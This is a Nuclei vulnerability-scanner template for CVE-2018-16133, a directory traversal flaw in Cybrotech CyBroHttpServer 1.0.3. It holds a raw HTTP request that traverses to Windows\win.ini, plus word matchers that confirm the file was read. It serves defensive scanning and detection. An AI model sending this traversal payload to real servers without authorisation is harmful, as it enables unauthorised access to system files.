nuclei-templates/http/cves/2018/CVE-2018-16133.yaml

44 lines
1.3 KiB
YAML

id: CVE-2018-16133
info:
name: Cybrotech CyBroHttpServer 1.0.3 - Local File Inclusion
author: 0x_Akoko
severity: medium
description: Cybrotech CyBroHttpServer 1.0.3 is vulnerable to local file inclusion in the URI.
remediation: |
Apply the latest security patches or updates provided by the vendor to fix the LFI vulnerability in Cybrotech CyBroHttpServer 1.0.3.
reference:
- https://packetstormsecurity.com/files/149177/Cybrotech-CyBroHttpServer-1.0.3-Directory-Traversal.html
- http://www.cybrotech.com/
- https://github.com/EmreOvunc/CyBroHttpServer-v1.0.3-Directory-Traversal
- https://nvd.nist.gov/vuln/detail/CVE-2018-16133
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2018-16133
cwe-id: CWE-22
epss-score: 0.05113
epss-percentile: 0.92051
cpe: cpe:2.3:a:cybrotech:cybrohttpserver:1.0.3:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: cybrotech
product: cybrohttpserver
tags: lfi,packetstorm,cve,cve2018,cybrotech
http:
- raw:
- |+
GET \..\..\..\..\Windows\win.ini HTTP/1.1
Host: {{Hostname}}
unsafe: true
matchers:
- type: word
part: body
words:
- "bit app support"
- "fonts"
- "extensions"
condition: and